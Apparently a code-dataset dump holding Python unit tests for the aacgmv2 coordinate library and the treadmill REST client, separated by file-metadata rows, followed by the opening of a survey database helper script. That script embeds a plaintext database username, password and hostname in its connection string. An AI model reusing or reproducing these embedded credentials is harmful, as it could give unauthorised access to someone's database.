(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60, 61], 0, 300,
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_arr_mix(self):
"""Test array AACGMV2 calculation for an array and floats"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(np.array([60, 61]), 0,
300, self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_mult_arr_mix(self):
"""Test array AACGMV2 calculation for a multi-dim array and
floats"""
mlat_in = np.array([[60, 61, 62], [63, 64, 65]])
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(mlat_in, 0, 300,
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[[58.2247461, 59.3164801, 60.4008651],
[61.4780560, 62.5481858, 63.6113609]],
rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[[81.1761103, 81.6228136, 82.0969646],
[82.6013918, 83.1393547, 83.7146224]],
rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[[0.18891995, 0.21870017, 0.25031024],
[0.28393872, 0.31980291, 0.35815409]],
rtol=1e-4)
del mlat_in
def test_get_aacgm_coord_arr_arr_unequal(self):
"""Test array AACGMV2 calculation for unequal arrays"""
mlat_in = np.array([[60, 61, 62], [63, 64, 65]])
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(mlat_in, np.array([0]),
np.array([300]),
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[[58.2247, 59.3165, 60.4009],
[61.4781, 62.5482, 63.6114]], rtol=1e-3)
np.testing.assert_allclose(self.mlon_out,
[[81.1761, 81.6228, 82.0970],
[82.6014, 83.1394, 83.7146]], rtol=1e-3)
np.testing.assert_allclose(self.mlt_out,
[[0.1889, 0.2187, 0.2503],
[0.2839, 0.3198, 0.3582]], rtol=1e-3)
del mlat_in
def test_get_aacgm_coord_arr_badidea(self):
"""Test array AACGMV2 calculation for BADIDEA"""
method = "BADIDEA"
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [3000],
self.dtime, method=method)
np.testing.assert_allclose(self.mlat_out, [64.35677791], rtol=1e-3)
np.testing.assert_allclose(self.mlon_out, [83.30272053], rtol=1e-3)
np.testing.assert_allclose(self.mlt_out, [0.33069397], rtol=1e-3)
del method
def test_get_aacgm_coord_arr_location_failure(self):
"""Test array AACGMV2 calculation with a bad location"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([0], [0], [0], self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
if not np.all([np.isnan(self.mlat_out), np.isnan(self.mlon_out),
np.isnan(self.mlt_out)]):
raise AssertionError()
def test_get_aacgm_coord_arr_time_failure(self):
"""Test array AACGMV2 calculation with a bad time"""
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
None)
def test_get_aacgm_coord_arr_datetime_date(self):
"""Test array AACGMV2 calculation with date and datetime input"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
self.ddate)
mlat_2, mlon_2, mlt_2 = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
self.dtime)
np.testing.assert_almost_equal(self.mlat_out, mlat_2, decimal=6)
np.testing.assert_almost_equal(self.mlon_out, mlon_2, decimal=6)
np.testing.assert_almost_equal(self.mlt_out, mlt_2, decimal=6)
del mlat_2, mlon_2, mlt_2
def test_warning_below_ground_get_aacgm_coord_arr(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [-1],
self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_get_aacgm_coord_arr_maxalt_failure(self):
"""For an array, test failure for an altitude too high for
coefficients"""
method = ""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [2001],
self.dtime, method=method)
if not np.all([np.isnan(self.mlat_out), np.isnan(self.mlon_out),
np.isnan(self.mlt_out)]):
raise AssertionError()
del method
def test_get_aacgm_coord_arr_mlat_failure(self):
"""Test error return for co-latitudes above 90 for an array"""
import logbook
lerr = u"unrealistic latitude"
with logbook.TestHandler() as handler:
with pytest.raises(AssertionError):
aacgmv2.get_aacgm_coord_arr([91, 60, -91], 0, 300,
self.dtime)
if not handler.has_error(lerr):
raise AssertionError()
handler.close()
class TestConvertCode:
@classmethod
def test_convert_str_to_bit_g2a(self):
"""Test conversion from string code to bit G2A"""
if aacgmv2.convert_str_to_bit("G2A") != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@classmethod
def test_convert_str_to_bit_a2g(self):
"""Test conversion from string code to bit A2G"""
if aacgmv2.convert_str_to_bit("A2G") != aacgmv2._aacgmv2.A2G:
raise AssertionError()
@classmethod
def test_convert_str_to_bit_trace(self):
"""Test conversion from string code to bit TRACE"""
if aacgmv2.convert_str_to_bit("TRACE") != aacgmv2._aacgmv2.TRACE:
raise AssertionError()
@classmethod
def test_convert_str_to_bit_allowtrace(self):
"""Test conversion from string code to bit ALLOWTRACE"""
if(aacgmv2.convert_str_to_bit("ALLOWTRACE") !=
aacgmv2._aacgmv2.ALLOWTRACE):
raise AssertionError()
@classmethod
def test_convert_str_to_bit_badidea(self):
"""Test conversion from string code to bit BADIDEA"""
if(aacgmv2.convert_str_to_bit("BADIDEA") !=
aacgmv2._aacgmv2.BADIDEA):
raise AssertionError()
@classmethod
def test_convert_str_to_bit_geocentric(self):
"""Test conversion from string code to bit GEOCENTRIC"""
if(aacgmv2.convert_str_to_bit("GEOCENTRIC") !=
aacgmv2._aacgmv2.GEOCENTRIC):
raise AssertionError()
@classmethod
def test_convert_str_to_bit_lowercase(self):
"""Test conversion from string code to bit for a lowercase code"""
if aacgmv2.convert_str_to_bit("g2a") != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@classmethod
def test_convert_str_to_bit_spaces(self):
"""Test conversion from string code to bit for a code with spaces"""
if(aacgmv2.convert_str_to_bit("G2A | trace") !=
aacgmv2._aacgmv2.G2A + aacgmv2._aacgmv2.TRACE):
raise AssertionError()
@classmethod
def test_convert_str_to_bit_invalid(self):
"""Test conversion from string code to bit for an invalid code"""
if aacgmv2.convert_str_to_bit("ggoogg|") != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@classmethod
def test_convert_bool_to_bit_g2a(self):
"""Test conversion from string code to bit G2A"""
if aacgmv2.convert_bool_to_bit() != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@classmethod
def test_convert_bool_to_bit_a2g(self):
"""Test conversion from string code to bit A2G"""
if aacgmv2.convert_bool_to_bit(a2g=True) != aacgmv2._aacgmv2.A2G:
raise AssertionError()
@classmethod
def test_convert_bool_to_bit_trace(self):
"""Test conversion from string code to bit TRACE"""
if aacgmv2.convert_bool_to_bit(trace=True) != aacgmv2._aacgmv2.TRACE:
raise AssertionError()
@classmethod
def test_convert_bool_to_bit_allowtrace(self):
"""Test conversion from string code to bit ALLOWTRACE"""
if(aacgmv2.convert_bool_to_bit(allowtrace=True) !=
aacgmv2._aacgmv2.ALLOWTRACE):
raise AssertionError()
@classmethod
def test_convert_bool_to_bit_badidea(self):
"""Test conversion from string code to bit BADIDEA"""
if(aacgmv2.convert_bool_to_bit(badidea=True) !=
aacgmv2._aacgmv2.BADIDEA):
raise AssertionError()
@classmethod
def test_convert_bool_to_bit_geocentric(self):
"""Test conversion from string code to bit GEOCENTRIC"""
if(aacgmv2.convert_bool_to_bit(geocentric=True) !=
aacgmv2._aacgmv2.GEOCENTRIC):
raise AssertionError()
class TestMLTConvert:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.dtime2 = dt.datetime(2015, 1, 1, 10, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.mlon_out = None
self.mlt_out = None
self.mlt_diff = None
self.mlon_list = [270.0, 80.0, -95.0]
self.mlt_list = [12.0, 25.0, -1.0]
self.mlon_comp = [-101.657689, 93.34231102, 63.34231102]
self.mlt_comp = [12.77717927, 0.1105126, 12.44384593]
self.diff_comp = np.ones(shape=(3,)) * -10.52411552
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.mlon_out, self.mlt_out, self.mlt_list, self.mlon_list
del self.mlon_comp, self.mlt_comp, self.mlt_diff, self.diff_comp
def test_date_input(self):
"""Test to see that the date input works"""
self.mlt_out = aacgmv2.convert_mlt(self.mlon_list, self.ddate,
m2a=False)
np.testing.assert_allclose(self.mlt_out, self.mlt_comp, rtol=1.0e-4)
def test_datetime_exception(self):
"""Test to see that a value error is raised with bad time input"""
with pytest.raises(ValueError):
self.mlt_out = aacgmv2.wrapper.convert_mlt(self.mlon_list, 1997)
def test_inv_convert_mlt_single(self):
"""Test MLT inversion for a single value"""
for i,mlt in enumerate(self.mlt_list):
self.mlon_out = aacgmv2.convert_mlt(mlt, self.dtime, m2a=True)
np.testing.assert_almost_equal(self.mlon_out, self.mlon_comp[i],
decimal=4)
def test_inv_convert_mlt_list(self):
"""Test MLT inversion for a list"""
self.mlon_out = aacgmv2.convert_mlt(self.mlt_list, self.dtime, m2a=True)
np.testing.assert_allclose(self.mlon_out, self.mlon_comp, rtol=1.0e-4)
def test_inv_convert_mlt_arr(self):
"""Test MLT inversion for an array"""
self.mlon_out = aacgmv2.convert_mlt(np.array(self.mlt_list), self.dtime,
m2a=True)
np.testing.assert_allclose(self.mlon_out, self.mlon_comp, rtol=1.0e-4)
def test_inv_convert_mlt_wrapping(self):
"""Test MLT wrapping"""
self.mlon_out = aacgmv2.convert_mlt(np.array([1, 25, -1, 23]),
self.dtime, m2a=True)
np.testing.assert_almost_equal(self.mlon_out[0], self.mlon_out[1],
decimal=6)
np.testing.assert_almost_equal(self.mlon_out[2], self.mlon_out[3],
decimal=6)
def test_mlt_convert_mlon_wrapping(self):
"""Test mlon wrapping"""
self.mlt_out = aacgmv2.convert_mlt(np.array([270, -90, 1, 361]),
self.dtime, m2a=False)
np.testing.assert_almost_equal(self.mlt_out[0], self.mlt_out[1],
decimal=6)
np.testing.assert_almost_equal(self.mlt_out[2], self.mlt_out[3],
decimal=6)
def test_mlt_convert_single(self):
"""Test MLT calculation for a single value"""
for i,mlon in enumerate(self.mlon_list):
self.mlt_out = aacgmv2.convert_mlt(mlon, self.dtime, m2a=False)
np.testing.assert_almost_equal(self.mlt_out, self.mlt_comp[i],
decimal=4)
def test_mlt_convert_list(self):
"""Test MLT calculation for a list"""
self.mlt_out = aacgmv2.convert_mlt(self.mlon_list, self.dtime,
m2a=False)
np.testing.assert_allclose(self.mlt_out, self.mlt_comp, rtol=1.0e-4)
def test_mlt_convert_arr(self):
"""Test MLT calculation for an array"""
self.mlt_out = aacgmv2.convert_mlt(np.array(self.mlon_list),
self.dtime, m2a=False)
np.testing.assert_allclose(self.mlt_out, self.mlt_comp, rtol=1.0e-4)
def test_mlt_convert_change(self):
"""Test that MLT changes with UT"""
self.mlt_out = aacgmv2.convert_mlt(self.mlon_list, self.dtime)
self.mlt_diff = self.mlt_out - aacgmv2.convert_mlt(self.mlon_list,
self.dtime2)
np.testing.assert_allclose(self.mlt_diff, self.diff_comp, rtol=1.0e-4)
class TestCoeffPath:
def setup(self):
"""Runs before every method to create a clean testing setup"""
import os
os.environ['IGRF_COEFFS'] = "default_igrf"
os.environ['AACGM_v2_DAT_PREFIX'] = "default_coeff"
self.default_igrf = os.environ['IGRF_COEFFS']
self.default_coeff = os.environ['AACGM_v2_DAT_PREFIX']
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.default_igrf, self.default_coeff
def test_set_coeff_path_default(self):
"""Test the coefficient path setting using default values"""
import os
aacgmv2.wrapper.set_coeff_path()
if os.environ['IGRF_COEFFS'] != self.default_igrf:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != self.default_coeff:
raise AssertionError()
@classmethod
def test_set_coeff_path_string(self):
"""Test the coefficient path setting using two user specified values"""
import os
aacgmv2.wrapper.set_coeff_path("hi", "bye")
if os.environ['IGRF_COEFFS'] != "hi":
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != "bye":
raise AssertionError()
@classmethod
def test_set_coeff_path_true(self):
"""Test the coefficient path setting using the module values"""
import os
aacgmv2.wrapper.set_coeff_path(True, True)
if os.environ['IGRF_COEFFS'] != aacgmv2.IGRF_COEFFS:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != aacgmv2.AACGM_v2_DAT_PREFIX:
raise AssertionError()
def test_set_only_aacgm_coeff_path(self):
"""Test the coefficient path setting using a mix of input"""
import os
aacgmv2.wrapper.set_coeff_path(coeff_prefix="hi")
if os.environ['IGRF_COEFFS'] != self.default_igrf:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != "hi":
raise AssertionError()
def test_set_only_igrf_coeff_path(self):
"""Test the coefficient path setting using a mix of input"""
import os
aacgmv2.wrapper.set_coeff_path(igrf_file="hi")
if os.environ['IGRF_COEFFS'] != "hi":
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != self.default_coeff:
raise AssertionError()
@classmethod
def test_set_both_mixed(self):
"""Test the coefficient path setting using a mix of input"""
import os
aacgmv2.wrapper.set_coeff_path(igrf_file=True, coeff_prefix="hi")
if os.environ['IGRF_COEFFS'] != aacgmv2.IGRF_COEFFS:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != "hi":
raise AssertionError()
| 43.727509 | 80 | 0.583632 | 6,424 | 50,549 | 4.386519 | 0.050903 | 0.087654 | 0.036907 | 0.051421 | 0.924696 | 0.893928 | 0.862806 | 0.842613 | 0.800206 | 0.764931 | 0 | 0.068246 | 0.310392 | 50,549 | 1,155 | 81 | 43.765368 | 0.740125 | 0.096322 | 0 | 0.699317 | 0 | 0 | 0.015056 | 0.000487 | 0 | 0 | 0 | 0 | 0.273349 | 1 | 0.107062 | false | 0 | 0.02164 | 0 | 0.137813 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7fbebf780d053dff7411f08d78926f808c92c102 | 13,428 | py | Python | lib/python/treadmill/tests/restclient_test.py | ms-petrugarstea/treadmill | 4c813baf8831918744b5af020938c8a51ed15c72 | [
"Apache-2.0"
] | 1 | 2017-02-27T15:11:00.000Z | 2017-02-27T15:11:00.000Z | lib/python/treadmill/tests/restclient_test.py | godsarmy/treadmill | 4c813baf8831918744b5af020938c8a51ed15c72 | [
"Apache-2.0"
] | null | null | null | lib/python/treadmill/tests/restclient_test.py | godsarmy/treadmill | 4c813baf8831918744b5af020938c8a51ed15c72 | [
"Apache-2.0"
] | null | null | null | """Unit test for treadmill.restclient.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import mock
import simplejson.scanner as sjs
import requests
from six.moves import http_client
from treadmill import restclient
class RESTClientTest(unittest.TestCase):
"""Mock test for RESTClient"""
def setUp(self):
"""Setup common test variables"""
pass
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_ok(self, resp_mock):
"""Test treadmill.restclient.get OK (200)"""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
resp = restclient.get('http://foo.com', '/')
self.assertIsNotNone(resp)
self.assertEqual(resp.text, 'foo')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_404(self, resp_mock):
"""Test treadmill.restclient.get NOT_FOUND (404)"""
resp_mock.return_value.status_code = http_client.NOT_FOUND
with self.assertRaises(restclient.NotFoundError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_409(self, resp_mock):
"""Test treadmill.restclient.get CONFLICT (409)"""
resp_mock.return_value.status_code = http_client.CONFLICT
with self.assertRaises(restclient.AlreadyExistsError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_424(self, resp_mock):
"""Test treadmill.restclient.get FAILED_DEPENDENCY (424)"""
resp_mock.return_value.status_code = http_client.FAILED_DEPENDENCY
resp_mock.return_value.json.return_value = {}
with self.assertRaises(restclient.ValidationError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_401(self, resp_mock):
"""Test treadmill.restclient.get UNAUTHORIZED (401)"""
# XXX: Correct code in FORBIDDEN. Support invalid UNAUTHORIZED during
# migration.
resp_mock.return_value.status_code = http_client.UNAUTHORIZED
resp_mock.return_value.json.return_value = {}
with self.assertRaises(restclient.NotAuthorizedError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_403(self, resp_mock):
"""Test treadmill.restclient.get FORBIDDEN (403)"""
resp_mock.return_value.status_code = http_client.FORBIDDEN
resp_mock.return_value.json.return_value = {}
with self.assertRaises(restclient.NotAuthorizedError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_bad_json(self, resp_mock):
"""Test treadmill.restclient.get bad JSON"""
resp_mock.return_value.status_code = http_client.INTERNAL_SERVER_ERROR
resp_mock.return_value.text = '{"bad json"'
resp_mock.return_value.json.side_effect = sjs.JSONDecodeError(
'Foo', '{"bad json"', 1
)
self.assertRaises(
restclient.MaxRequestRetriesError,
restclient.get, 'http://foo.com', '/', retries=1)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('treadmill.restclient._handle_error', mock.Mock())
@mock.patch('requests.get', mock.Mock())
def test_retry(self):
"""Tests retry logic."""
with self.assertRaises(restclient.MaxRequestRetriesError) as cm:
restclient.get(
['http://foo.com', 'http://bar.com'],
'/baz',
retries=3
)
err = cm.exception
self.assertEqual(len(err.attempts), 6)
# Requests are done in order, by because other methods are being
# called, to make test simpler, any_order is set to True so that
# test will pass.
requests.get.assert_has_calls([
mock.call('http://foo.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(.5, 10),
stream=None, verify=True),
mock.call('http://bar.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(.5, 10),
stream=None, verify=True),
mock.call('http://foo.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(1.5, 10),
stream=None, verify=True),
mock.call('http://bar.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(1.5, 10),
stream=None, verify=True),
mock.call('http://foo.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(2.5, 10),
stream=None, verify=True),
mock.call('http://bar.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(2.5, 10),
stream=None, verify=True),
], any_order=True)
self.assertEqual(requests.get.call_count, 6)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('requests.get',
side_effect=requests.exceptions.ConnectionError)
def test_retry_on_connection_error(self, _):
"""Test retry on connection error"""
with self.assertRaises(restclient.MaxRequestRetriesError) as cm:
restclient.get('http://foo.com', '/')
err = cm.exception
self.assertEqual(len(err.attempts), 5)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('requests.get', side_effect=requests.exceptions.Timeout)
def test_retry_on_request_timeout(self, _):
"""Test retry on request timeout"""
with self.assertRaises(restclient.MaxRequestRetriesError) as cm:
restclient.get('http://foo.com', '/')
err = cm.exception
self.assertEqual(len(err.attempts), 5)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('requests.get', return_value=mock.MagicMock(requests.Response))
def test_retry_on_503(self, resp_mock):
"""Test retry for status code that should be retried (e.g. 503)"""
resp_mock.return_value.status_code = http_client.SERVICE_UNAVAILABLE
with self.assertRaises(restclient.MaxRequestRetriesError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get', return_value=mock.MagicMock(requests.Response))
def test_default_timeout_get(self, resp_mock):
"""Tests that default timeout for get request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.get('http://foo.com', '/')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json=None, timeout=(0.5, 10), proxies=None
)
@mock.patch('requests.delete',
return_value=mock.MagicMock(requests.Response))
def test_default_timeout_delete(self, resp_mock):
"""Tests that default timeout for delete request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.delete('http://foo.com', '/')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json=None, timeout=(0.5, None), proxies=None
)
@mock.patch('requests.post',
return_value=mock.MagicMock(requests.Response))
def test_default_timeout_post(self, resp_mock):
"""Tests that default timeout for post request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.post('http://foo.com', '/', '')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json='', timeout=(0.5, None), proxies=None
)
@mock.patch('requests.put', return_value=mock.MagicMock(requests.Response))
def test_default_timeout_put(self, resp_mock):
"""Tests that default timeout for put request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.put('http://foo.com', '/', '')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json='', timeout=(0.5, None), proxies=None
)
@mock.patch('requests.get', return_value=mock.MagicMock(requests.Response))
def test_verify_get(self, resp_mock):
"""Tests that 'verify' for get request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.get('http://foo.com', '/', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json=None, timeout=(0.5, 10), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.delete',
return_value=mock.MagicMock(requests.Response))
def test_verify_delete(self, resp_mock):
"""Tests that 'verify' for delete request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.delete('http://foo.com', '/', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json=None, timeout=(0.5, None), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.post',
return_value=mock.MagicMock(requests.Response))
def test_verify_post(self, resp_mock):
"""Tests that 'verify' for post request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.post('http://foo.com', '/', '', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json='', timeout=(0.5, None), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.put', return_value=mock.MagicMock(requests.Response))
def test_verify_put(self, resp_mock):
"""Tests that 'verify' for put request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.put('http://foo.com', '/', '', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json='', timeout=(0.5, None), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.delete',
return_value=mock.MagicMock(requests.Response))
def test_raw_payload_delete(self, resp_mock):
"""Tests that delete can handle not json serializable payload."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.delete('http://foo.com', '/', 'payload',
payload_to_json=False)
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, timeout=(0.5, None), proxies=None,
data='payload', verify=True
)
@mock.patch('requests.post',
return_value=mock.MagicMock(requests.Response))
def test_raw_payload_post(self, resp_mock):
"""Tests that post can send payload not in json."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.post('http://foo.com', '/', 'payload',
payload_to_json=False)
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, timeout=(0.5, None), proxies=None,
data='payload', verify=True
)
@mock.patch('requests.put', return_value=mock.MagicMock(requests.Response))
def test_raw_payload_put(self, resp_mock):
"""Tests that put can send payload not in json."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.put('http://foo.com', '/', 'payload',
payload_to_json=False)
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, timeout=(0.5, None), proxies=None,
data='payload', verify=True
)
if __name__ == '__main__':
unittest.main()
| 42.900958 | 79 | 0.626527 | 1,648 | 13,428 | 4.927184 | 0.101335 | 0.065025 | 0.062069 | 0.084236 | 0.843473 | 0.824261 | 0.803941 | 0.757882 | 0.702217 | 0.67931 | 0 | 0.009179 | 0.23734 | 13,428 | 312 | 80 | 43.038462 | 0.783713 | 0.103738 | 0 | 0.59322 | 0 | 0 | 0.102487 | 0.002856 | 0 | 0 | 0 | 0 | 0.118644 | 1 | 0.097458 | false | 0.004237 | 0.042373 | 0 | 0.144068 | 0.004237 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f6864a1116b38da0105ca8948d35cb465d860c59 | 29,568 | py | Python | db_helper.py | Media-Bias-Group/Teaching-Platform | f3ebfa9936be1c595284967ee3998bbdaad3deb9 | [
"MIT"
] | null | null | null | db_helper.py | Media-Bias-Group/Teaching-Platform | f3ebfa9936be1c595284967ee3998bbdaad3deb9 | [
"MIT"
] | null | null | null | db_helper.py | Media-Bias-Group/Teaching-Platform | f3ebfa9936be1c595284967ee3998bbdaad3deb9 | [
"MIT"
] | null | null | null | import csv
import sys
import pandas as pd
from surveyapi.models import db, Survey, Question, AnnotationSentences, SimpleChoice, RangeSliderChoice, TestSurveyGroups, SurveyRecord, Annotations
from surveyapi.create_app import create_app
from prettytable import PrettyTable
from sqlalchemy import text
from sqlalchemy import create_engine
from pprint import pprint
from collections import OrderedDict
SQLALCHEMY_DATABASE_URI = "mysql+mysqlconnector://{username}:{password}@{hostname}/{databasename}".format(
username="mediabias",
password="Tools4bias*Detection",
hostname="mediabias.mysql.pythonanywhere-services.com",
databasename="mediabias$survey"
)
MAX_QUOTA = 10
def create_db_client():
app = create_app()
ctx = app.app_context()
db.init_app(app)
return db, ctx
def get_empty_annotations(db, ctx, after_date='2000-10-10 00:00:00'):
t = PrettyTable(['identifier_key', 'survey_record_id', 'sentence_group_id', 'worker_started_at', 'count'])
ctx.push()
count = 0
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
